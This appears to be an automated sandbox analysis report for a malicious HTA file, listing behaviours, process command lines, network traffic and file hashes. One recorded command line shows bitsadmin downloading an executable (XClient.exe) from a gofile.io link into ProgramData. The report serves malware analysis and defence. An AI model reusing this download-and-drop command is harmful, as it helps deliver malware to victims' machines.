Analysis Overview
SHA256
ef8789feee0030d961135116b75790b99bd914de5467671023dec1cafcb0ca1e
Threat Level: Likely malicious
The file Downloader.hta was found to be: Likely malicious.
Malicious Activity Summary
Download via BitsAdmin
Checks computer location settings
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Checks SCSI registry key(s)
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-27 07:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-27 07:33
Reported
2024-08-27 07:50
Platform
win10v2004-20240802-en
Max time kernel
436s
Max time network
438s
Command Line
Signatures
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3296 wrote to memory of 4784 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\bitsadmin.exe |
| PID 3296 wrote to memory of 4784 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\bitsadmin.exe |
| PID 3296 wrote to memory of 4784 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\bitsadmin.exe |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://gofile.io/d/G6Wixe C:\ProgramData\XClient.exe
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gofile.io | udp |
| FR | 51.38.43.18:443 | gofile.io | tcp |
| US | 8.8.8.8:53 | 18.43.38.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.73.42.20.in-addr.arpa | udp |
Files
memory/4856-1-0x000001345E940000-0x000001345E941000-memory.dmp
memory/4856-3-0x000001345E940000-0x000001345E941000-memory.dmp
memory/4856-2-0x000001345E940000-0x000001345E941000-memory.dmp
memory/4856-13-0x000001345E940000-0x000001345E941000-memory.dmp
memory/4856-12-0x000001345E940000-0x000001345E941000-memory.dmp
memory/4856-11-0x000001345E940000-0x000001345E941000-memory.dmp
memory/4856-10-0x000001345E940000-0x000001345E941000-memory.dmp
memory/4856-9-0x000001345E940000-0x000001345E941000-memory.dmp
memory/4856-8-0x000001345E940000-0x000001345E941000-memory.dmp
memory/4856-7-0x000001345E940000-0x000001345E941000-memory.dmp
C:\Users\Admin\Desktop\Microsoft Edge.lnk
| MD5 | 7deb1c5ca7b35696ce4dff97b5bbf1c6 |
| SHA1 | 6ed83ea50a26071d4d1e52608935d5d04892e8c1 |
| SHA256 | 7151dc306e0ded55c326d2ca1e86f7097ec665a49ab61fcb8d16fc66db8fcc3d |
| SHA512 | cf385c2c59ecba2e9d7c6484ad941728c91e1a3963612f8374e41d9bb17622945c49e4981b683227dafd388f5d69daaf892e3b7ef4157c0ec7a4b818b91880ae |
C:\Users\Public\Desktop\Acrobat Reader DC.lnk
| MD5 | d430547f4c6d64c4f36053f42de1b4d0 |
| SHA1 | 9e92d41693a134f3ac4fb06f7aba663c8c856115 |
| SHA256 | 10b0351332b326d17b516202e0a5bdf2f793377db77c373547b1eb564942cee4 |
| SHA512 | ac3db5254d551c1864c1ae411c8d6f87435277e18c1f5642c6b36da013a30087e56f28b66a7b6128de98e5ea0f87a57f5fd9061c545a8beb85658db85819b6da |
C:\Users\Public\Desktop\VLC media player.lnk
| MD5 | d90d015c1ee2f3ce05a221185a209f92 |
| SHA1 | 13bf0ab97b52e901b3573dcea67f0be856f5f49d |
| SHA256 | 66261ef5bff2722cdafecdb7b705c22ace1bd18bd9c515bea4f9e177ccfe431b |
| SHA512 | e854bbd237b8ba92150db6c4ab8cfdb0e48a42264d73a73c1f1dbd3cd7f988d3c493d2cde94f9b52cbfaad0b8d2acbee6baae457776c68831095ea3923e1ccb1 |
C:\Users\Public\Desktop\Firefox.lnk
| MD5 | b5b1db65ee4b5444f47f3ba856ba3a2c |
| SHA1 | e26f2a2d3ce5c951d6540977e25eec2fc644b808 |
| SHA256 | 7cf618a1e89f30170449a33a2ad7c8063970c71548beda7c31a808582cb8bce0 |
| SHA512 | 27cee9c30552a6db9ce35d37e7207af7fdf1ef4db62bf2de712974976d3af8d8d0c1c2cd4624cb238daa4e26eb07147eb653a618630b9fa1daecba95d18c9607 |
C:\Users\Public\Desktop\Google Chrome.lnk
| MD5 | 506b5c060574b432deecfd9b8ce43ef5 |
| SHA1 | 364f5adb90065d1df1c84c088e3248f8bd166dd9 |
| SHA256 | e41ff00c3bb1a2cfe3d73e11e9ef290fc69fb243bd0f6f34c4d337d98784a16f |
| SHA512 | eede8f95a5ceb64ff58b5ebe314d8e80a8b291cb2e2ad51b080abf39a0163a9f19518d071095da50e0ad2e5c6df85b6d491a3d574132deb646ae40a07020699a |
C:\Users\Admin\Desktop\BackupBlock.mpeg
| MD5 | 31a961554550bc20d98f8d4bc2a2eb4a |
| SHA1 | c54ba0d45613f6a9d2dd965911aec209ae81d84c |
| SHA256 | b6c3592eb02c4442edec479e0a69ccf510d9bf3447935e0aa212e70dfd305a37 |
| SHA512 | 8d4c4bf5ca8dd577efcb9b3a87cfaf46dc47b8da85960ab4f00c82c7701a0f3df9232d0e816e76e60d465770409e3390988162682588586fbb57ed45b3364824 |
C:\Users\Admin\Desktop\ConnectFormat.xlt
| MD5 | b0191b2d7cef4844ae7b4c1a5544b8a1 |
| SHA1 | df4000ed8ecd641a03d6da4096746d7acb0e241c |
| SHA256 | 4b80b7f7aa032b991524bd61679429fc6ca45df98e0079af82f24b16723f9ec0 |
| SHA512 | f985b913d60753f47ccbba801290c6753c031cc6f3203d866d0ec29ce8e5412b150c8aa8f270c323d5aaa0472b6533d61805f75b34a3d0ee5334c6d4127b336a |
C:\Users\Admin\Desktop\ConnectCheckpoint.fon
| MD5 | 3364bd77392aeb28314998c46b03291d |
| SHA1 | 9dbe19ca0ceef47e87b28abf3103fb074bb03f2f |
| SHA256 | ad2ef332410d0a389473a94be70b1c5637a9af7695a7d6e33de89455a5d6db57 |
| SHA512 | d837be3fc459417530912da25f581364c105fbe42b8928fc1b3f7a39b86e352aba88b24d8fa4d404bb5cfd7517d1213cc44910d2f3fc5d16df6b1afdd5b8a108 |
C:\Users\Admin\Desktop\CheckpointStart.xlsm
| MD5 | 7cf25f0c59a7d5762308c96fbd450f8f |
| SHA1 | 654aab086e03a0d679b9b3c12042cbf600b87da5 |
| SHA256 | b5dd655700966ccfba7bec45853555096288272631e22d303678e1eba3300164 |
| SHA512 | d1b92dd6905923f6b21ab2506675fff794fd326f2dca30d45eefec0065d8a9e4d085af95ce87923686017a5349c76be304948d762b256905c90bda6b20d45e7c |
C:\Users\Admin\Desktop\CopyMount.mpeg2
| MD5 | a24cc5e62521870e7c38d9e80f9a2f29 |
| SHA1 | 6e7e428d486eb7340937ef453452286279af3c27 |
| SHA256 | 7d58dc4b0dbfd40d8e395f46f99045f34f521efab7b86941a889d621b9b8600d |
| SHA512 | 9cf0f03247b94f78fc16e1c6d2e930b6df2c155a3477733c587f8d888055c361fe6bda980a21cf8354412c09a5a1fc3cdee0992c5184ccd31f8252e894a41911 |
C:\Users\Admin\Desktop\InitializeRename.mp3
| MD5 | 0fc1944f7f3a6105682e064e034b57dd |
| SHA1 | 274e92505f3b738f7a889c2a6f2afc50065ba765 |
| SHA256 | 6ac937803105e4fc99ae6503b9219023bc62682e4461bde0d271d5b9950be66a |
| SHA512 | b80259905850a4c5ffd3420ff4e2abae411089051506c65d1abd689131b5429f8a46033e75ddd87f797a688ecda9f311eb7141f7b13330fc5f53d3f4693d1451 |
C:\Users\Admin\Desktop\InvokeAssert.zip
| MD5 | 3413700e5c085d38c9c397e1b05b6ac5 |
| SHA1 | 7f4113b5f63afbbe0f092ba0bb2c5f64733c370d |
| SHA256 | 6482a724de2e83cc45d250273203f29fe4a30a563572cfac1696b1647133679c |
| SHA512 | b96263f521ffb05b769add1c486b5d301bd6295e091c415bb17769380514e700e3d46f45116af8223f25258fdddd88ed1cdfcaa60de11a8d701010ffb9fd049c |
C:\Users\Admin\Desktop\LockRestore.jpg
| MD5 | bbef9477bb378e2244eeab7e47779447 |
| SHA1 | a590dfd26a8f9f0f9bee079231b9e108cd646c1e |
| SHA256 | 6b777ec658803c6430d37109eff95d37e96bc3674251bb0e56011760302716af |
| SHA512 | 8ec52f0ed2c6e28dbe1403e3bd61569f809b5f452b160132f2c2da6299eb6c0ce1bfe905c64349991e26d35487605c18730e7ef935f69d05d0a51e08db1496d5 |
C:\Users\Admin\Desktop\MeasureCheckpoint.ico
| MD5 | 23114327ef8a993a9cd6ed124d64f1d4 |
| SHA1 | 86fcf88e115b435f61de3661517bee9d8fa48d6d |
| SHA256 | 60ef38c99c289a6567c07fa91a18c9bc96d339c2899300eb6b393cdf65d4f071 |
| SHA512 | 972561e0fd3cfb304867ac5dd964092c5b91af47bdf0c99e0d269dea96c612d9a736cc3e7bbce043074cb73c552e3a51beb4882c6590ec07d7ba32886ba2e10d |
C:\Users\Admin\Desktop\OpenPop.xht
| MD5 | 6e4f1bd7a03f9f6f4a56459b9ee0a8cf |
| SHA1 | 31f4b269b221d5ff6557b0289a3c6c41f5110210 |
| SHA256 | 79307b5fb6fc89dcdd1fd65e960398e764b4eb6aaf0c0190615dfe43a7c99463 |
| SHA512 | 03d13b4296b47d4e3c0fcf984f8af2e0b8b4c8b954f4b419766385408311e1cc7a2066bcfc808bfecb3755919b56147525c36bfe41abae5e508f1b89b0efad5a |
C:\Users\Admin\Desktop\MergeCopy.otf
| MD5 | 053dba12b4871ee25090cd330e4fb860 |
| SHA1 | 2d75ecf39d9f1fc04c30556f77ac91609fdadaaf |
| SHA256 | 7fcad3c9a9d66f09e8ff310658c3434050c5a9c9a7fabc5bf8981ce5f93f685a |
| SHA512 | cf7b7ab0ec26e2a06aee0a0ba6a47f434e8b9b4c40964ce3c0b1161a32717dfd1a88270b310742e23499073b54844b58043d7a09f09b71247aa4f2f5f9805821 |
C:\Users\Admin\Desktop\PingEnable.avi
| MD5 | 1ff53171f76bfce6a7664fd789db639b |
| SHA1 | 33adcaf96039b929a196bd9eb21489c95663da5e |
| SHA256 | 610ec195d3419d7cf235a87eeca086fb953d90bfb91995c56fff5b2fa46ff47b |
| SHA512 | 510cdb0957a3a9a6c929dedec194e4ad47c725a40854f4303e88e62701bedd4dd60965f18e981f91d8483e241a5cabe379f3f505cf47e8d45caac27b24be8bba |
C:\Users\Admin\Desktop\ReadExit.hta
| MD5 | 29553d5a7ceef758ec9060430b4b0361 |
| SHA1 | 509f59067d571fbf863eb6ccf6cfa89b0939fca4 |
| SHA256 | 3866a1665b992bba5edd9dd5dae5e3140b84337a044101f18480b4783fa16c68 |
| SHA512 | 7974166ae431d92276b995aea86405bcd5d1d9f4529d738f231da1829c9a3d4b1ac2f1de9a4a377055a4a9baf05e85b45a654e54a70e4bc86b7e8996ed8b5322 |
C:\Users\Admin\Desktop\PublishRestore.xhtml
| MD5 | 2cfe3191919b6e2d5b1b1f4e6ebf3495 |
| SHA1 | a98d3a6fc91a28096694c093f14b4baf9ad3ba47 |
| SHA256 | b9833241cd68bdb9d51b351bd7ab42dae89db1425a34fd6ba6553eff70d5abd4 |
| SHA512 | de2e49e5f0c1ad44c06aff41b1a6c23fa03385e364f02569e051c20a1149227c5b936ee99e6b23a07e85ab67c1faf55647e4fd187e78027fc7b8be0936a63858 |
C:\Users\Admin\Desktop\PublishApprove.mpe
| MD5 | 9154cfde9cc004bea75f38ac5185448a |
| SHA1 | 17fedbd4f298c68f5a941249ddf05a40a3c955cc |
| SHA256 | 196f09d684a985dbcdacc883a4916a4d909c7f5f66265190de948afd5acc188d |
| SHA512 | 13fe5443db643b027d4eca5596b4165b80e8ad8bd19cb2534a39c7a51f0978b30bed2399f8815e2dc6de73f2840c456805c924ab5eaf44d42cd22c492fa8f75d |
C:\Users\Admin\Desktop\RenameLock.bmp
| MD5 | 55869ca111b70a9a1a131a9313a329c6 |
| SHA1 | 6e0b234551baaa25e627a729b166ec32102bee1f |
| SHA256 | 068ec3b044c25c83240d62a2f39b70c7956bbcea7f30d560830e3aafcc54449d |
| SHA512 | 732064f8ac16b90e0155aa6b4765e5e6c813733192182ecbc8cacb41734982924f8abe862a4a882725f2eac4aa162ccdd485d9af96bce5bf48edc60db905df93 |
C:\Users\Admin\Desktop\RevokeSend.html
| MD5 | e6fa18e12e26d2b050465d26a7bc120d |
| SHA1 | 570a651c4efb13d51a6cacb1c35022bead84d16a |
| SHA256 | 5d81dba4b3d860c0354191f673d4a0f6aa3fe50b2fcf2ce811a38a7ed55f4934 |
| SHA512 | ebe0881ce15de964ab317d08c489d8093a6e2b068a18515706864f96831a856c46ab68330b31bdd95431e6e34f4808b9ac055363002e58398d1dd2e6191c24f7 |
C:\Users\Admin\Desktop\SelectUndo.htm
| MD5 | c39141171f51cf1b73ed5c6889c9c9d6 |
| SHA1 | 8f5e7d89e86927bbb057606810e29c2c5c5a8f90 |
| SHA256 | c2aabc75edbe7b93ca8941ef1dce07472367053cc198deb406bff57dddba4de7 |
| SHA512 | 5f7322bbafcae996011a10e0188cb4a18a012f611f762f5ef5a97a12f75d9030b4ff66a1c4db1af18a5bad44db368ec4ac74cc8129895bbfb1457e330e265b2c |
C:\Users\Admin\Desktop\SendMove.potm
| MD5 | 690b6d9b156632bee7650f19d3251c0a |
| SHA1 | 2611e3a72c4402a7f7641fd9fdd06a64491d706f |
| SHA256 | 96b91a05863c88ba0ad2ed9fb69f2fce5313eda50094d52bfd27b4cd78d8e441 |
| SHA512 | 19ddfea8f2e7c92188675c1f7cd771b73c784b106f6d01a54db041a90a52adb20d7c37897504f694b9185b55992acad7f183d0a082d2a83fe81142cd997d546e |
C:\Users\Admin\Desktop\UnprotectDismount.fon
| MD5 | 2ca871b517a85333e5383d914ac4c48a |
| SHA1 | 8481c730ad9e50bb51abeb4555902760841ae1a4 |
| SHA256 | 9d417d8bd6835e8882dcbbb78f762554124f480b68285a9e7065e66344875022 |
| SHA512 | 298b8ca23a54aaa96275293dba5f0f5e0bd16f1befb03065abbf728493aed9cf80b6584dfa4e61071f5c502eab35dc173b9d13ee73550969844907ff81ec0cb6 |
C:\Users\Admin\Desktop\AssertReceive.svgz
| MD5 | 57bbe8f2a84b0af27b664561c704a5f5 |
| SHA1 | 5e69a282fc0faa72133b2fa210922b15c91a3d3d |
| SHA256 | f4196af133eb20259d992c006b213869f01270edd6b0689f9a1df8ae784f1a00 |
| SHA512 | 5c8bfbb0422ce2e85dd4b798cc5aa98f2756a1d9ed2e6c38bdf7611cea265b59b081edfba09ed070555b7d118d405b39469161b25980f27e52b5d0b4e67bdca6 |
C:\Users\Admin\Desktop\MoveLock.au
| MD5 | 869b921da3b35dfdc8be3f925125fd8c |
| SHA1 | 27ad0f1fe480a8f8c4dbcb8515a5248fb7f5255a |
| SHA256 | 2dabeded46918a45a40905eb3af723ec1abcaaa742a168b5a3c8098bd74f2edb |
| SHA512 | 2f1b00e7c892d5777e58dc713574835541e01d1ec6a771964660a99c0d247d2bf66199105a1bc91cffac32cf32d01834e44cc8691090f9de5504af7b5ca82a50 |
C:\Users\Admin\Desktop\ExportEnable.mpp
| MD5 | fb1d0702d40ff962c7b16168dd6a07bc |
| SHA1 | 266bbcafa5d7fab64657b7f4c1c10ad3a2548a5b |
| SHA256 | d47b1bf9bf1383f9deb010b0fdebd6e27a552c12751e5705865e69241b32c657 |
| SHA512 | 17884689cd3b86e8190ddfe0e683a5f50287f8ff98da24b0f4edf3addd5b902957d3df13dc44714c5782506c7b3ccdb3557c096c971ab574bedbbe686f222796 |
C:\Users\Admin\Desktop\StepMerge.docx
| MD5 | 77e2ad97e17d175237573de11920dd17 |
| SHA1 | 40a9eb49ccbe64c5d3231c465871bfbd2531c89d |
| SHA256 | e3d39f004cbc6c8869d68c5ccef3a1904315553d1bf3b6565804989850babdb3 |
| SHA512 | 3fce3beb4277ecd407f93d882c5349469d340574a30cb348efce6f78726bfc90998b5c54f1041d8a3ade299c03493a47301dd12f113c76643b1b3bb55c5301f8 |
C:\Users\Admin\Desktop\RedoFind.xml
| MD5 | ab03eee998a114f5ffb93a85f58dc6cc |
| SHA1 | 79e34ad28f3ac1020f27171e265ca55ee9072fa0 |
| SHA256 | afd5380c81b51f9d702cf78f7ed481b47dd6ec9c8e0da1ccc87e69c10658764d |
| SHA512 | 14adf82576881861585ce9dab6be6c413ae530f9122b51fdb2139c29953b6463e55b8249e1c9de50f339c08f89cf742d1a03c9c3f66945a931e4edbd5dbbd836 |
memory/3816-45-0x00000149A4BA0000-0x00000149A4BA1000-memory.dmp
memory/3816-44-0x00000149A4BA0000-0x00000149A4BA1000-memory.dmp
memory/3816-46-0x00000149A4BA0000-0x00000149A4BA1000-memory.dmp
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
| MD5 | d2fb266b97caff2086bf0fa74eddb6b2 |
| SHA1 | 2f0061ce9c51b5b4fbab76b37fc6a540be7f805d |
| SHA256 | b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a |
| SHA512 | c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8 |
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
| MD5 | f49655f856acb8884cc0ace29216f511 |
| SHA1 | cb0f1f87ec0455ec349aaa950c600475ac7b7b6b |
| SHA256 | 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba |
| SHA512 | 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8 |
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
| MD5 | 6bd369f7c74a28194c991ed1404da30f |
| SHA1 | 0f8e3f8ab822c9374409fe399b6bfe5d68cbd643 |
| SHA256 | 878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d |
| SHA512 | 8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93 |
memory/3816-51-0x00000149A4BA0000-0x00000149A4BA1000-memory.dmp
memory/3816-56-0x00000149A4BA0000-0x00000149A4BA1000-memory.dmp
memory/3816-55-0x00000149A4BA0000-0x00000149A4BA1000-memory.dmp
memory/3816-54-0x00000149A4BA0000-0x00000149A4BA1000-memory.dmp
memory/3816-53-0x00000149A4BA0000-0x00000149A4BA1000-memory.dmp
memory/3816-52-0x00000149A4BA0000-0x00000149A4BA1000-memory.dmp